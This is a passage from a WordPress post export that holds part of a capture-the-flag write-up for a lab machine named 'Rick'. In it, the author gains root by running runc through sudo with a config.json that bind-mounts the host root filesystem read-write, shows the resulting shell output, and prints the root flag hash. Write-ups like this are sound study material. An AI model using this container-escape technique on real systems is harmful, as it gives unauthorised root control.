LD_LIBRARY_PATH (unset)\n    LOGDIR (unset)\n    PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin\n    PERL_BADLANG (unset)\n    SHELL=\/bin\/bash\n\nYou have finished composing your message. At this point, you have \na few options. You can:\n\n    * [Se]nd the message to perlbug@perl.org and root@localhost, \n    * [D]isplay the message on the screen,\n    * [R]e-edit the message\n    * Display or change the message&#039;s [su]bject\n    * Save the message to a [f]ile to mail at another time\n    * [Q]uit without sending a message\n\nAction (Send\/Display\/Edit\/Subject\/Save to File): <\/code><\/pre>\n<h3>Fix for the root privilege escalation approach<\/h3>\n<p>Although we got a root shell, the filesystem inside it is read-only. In writeup wp1, rpj7 points out that changing a single setting is enough to make it writable!<\/p>\n<pre><code class=\"language-bash\"># ls -la\ntotal 32\ndrwx------  5 root root 4096 Nov 24  2021 .\ndrwxr-xr-x 18 root root 4096 Nov 24  2021 ..\nlrwxrwxrwx  1 root root    9 Nov 24  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwx------  3 root root 4096 Nov 24  2021 .gnupg\ndrwxr-xr-x  3 root root 4096 Aug 19  2019 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\ndrwx------  2 root root 4096 Nov 24  2021 .ssh\n-rwx------  1 root root   36 Nov 24  2021 root.txt\n# cat root.txt\n256fdda9b4e714bf9f38a92750debf70  -\n# pwd\n\/root\n# touch aaa\ntouch: cannot touch &#039;aaa&#039;: Read-only file system<\/code><\/pre>\n<p>Change the <code>root<\/code> section of <code>config.json<\/code> to:<\/p>\n<pre><code class=\"language-bash\">&quot;root&quot;: {\n                &quot;path&quot;: &quot;rootfs&quot;,\n                &quot;readonly&quot;: false            # defaults to true\n},<\/code><\/pre>\n<pre><code class=\"language-bash\">rick@rick:\/tmp$ vim config.json \nrick@rick:\/tmp$ diff 
config.json \/home\/rick\/config.json \n55c55\n&lt;               &quot;readonly&quot;: false\n---\n>               &quot;readonly&quot;: true\n65,74d64\n&lt;     &quot;type&quot;: &quot;bind&quot;,\n&lt;     &quot;source&quot;: &quot;\/&quot;,\n&lt;     &quot;destination&quot;: &quot;\/&quot;,\n&lt;     &quot;options&quot;: [\n&lt;         &quot;rbind&quot;,\n&lt;         &quot;rw&quot;,\n&lt;         &quot;rprivate&quot;\n&lt;     ]\n&lt; },\n&lt;               {\n188c178\n&lt; }\n---\n> }\n\\ No newline at end of file<\/code><\/pre>\n<p>Run the privilege escalation again and see whether the filesystem can be modified now:<\/p>\n<pre><code class=\"language-bash\">rick@rick:\/tmp$ sudo \/usr\/sbin\/runc run demo\n# cd ~\n# pwd\n\/root\n# ls -la\ntotal 32\ndrwx------  5 root root 4096 Nov 24  2021 .\ndrwxr-xr-x 18 root root 4096 Nov 24  2021 ..\nlrwxrwxrwx  1 root root    9 Nov 24  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwx------  3 root root 4096 Nov 24  2021 .gnupg\ndrwxr-xr-x  3 root root 4096 Aug 19  2019 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\ndrwx------  2 root root 4096 Nov 24  2021 .ssh\n-rwx------  1 root root   36 Nov 24  2021 root.txt\n# touch whoami\n# ls -la\ntotal 32\ndrwx------  5 root root 4096 Jul 16 04:21 .\ndrwxr-xr-x 18 root root 4096 Nov 24  2021 ..\nlrwxrwxrwx  1 root root    9 Nov 24  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwx------  3 root root 4096 Nov 24  2021 .gnupg\ndrwxr-xr-x  3 root root 4096 Aug 19  2019 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\ndrwx------  2 root root 4096 Nov 24  2021 .ssh\n-rwx------  1 root root   36 Nov 24  2021 root.txt\n-rw-r--r--  1 root root    0 Jul 16 04:21 whoami<\/code><\/pre>\n<p>The filesystem can be modified now!!!<\/p>\n<h2>References<\/h2>\n<p><a 
href=\"https:\/\/28right.blogspot.com\/2021\/12\/hackmyvm-rick.html\">https:\/\/28right.blogspot.com\/2021\/12\/hackmyvm-rick.html<\/a><\/p>\n<p><a href=\"https:\/\/mp.weixin.qq.com\/s?__biz=MzAwMjczNDMyNw==&amp;mid=2648181088&amp;idx=1&amp;sn=c164f1d714f24c6433bd03da49d896ed&amp;chksm=82e948f8b59ec1eebd597a3a678cbbfa1382e91a1b339ab1c6c74ae2cf49a35622beb10f63a6&amp;token=1576642971&amp;lang=zh_CN#rd\">https:\/\/mp.weixin.qq.com\/s?__biz=MzAwMjczNDMyNw==&mid=2648181088&idx=1&sn=c164f1d714f24c6433bd03da49d896ed&chksm=82e948f8b59ec1eebd597a3a678cbbfa1382e91a1b339ab1c6c74ae2cf49a35622beb10f63a6&token=1576642971&lang=zh_CN#rd<\/a><\/p>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1wt421776J\/\">https:\/\/www.bilibili.com\/video\/BV1wt421776J\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Rick \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick] \u2514\u2500$ rustsca [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-761","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/761","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=761"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/761\/revisions"}],"predecessor-version":[{"id":762,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\
/wp\/v2\/posts\/761\/revisions\/762"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=761"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}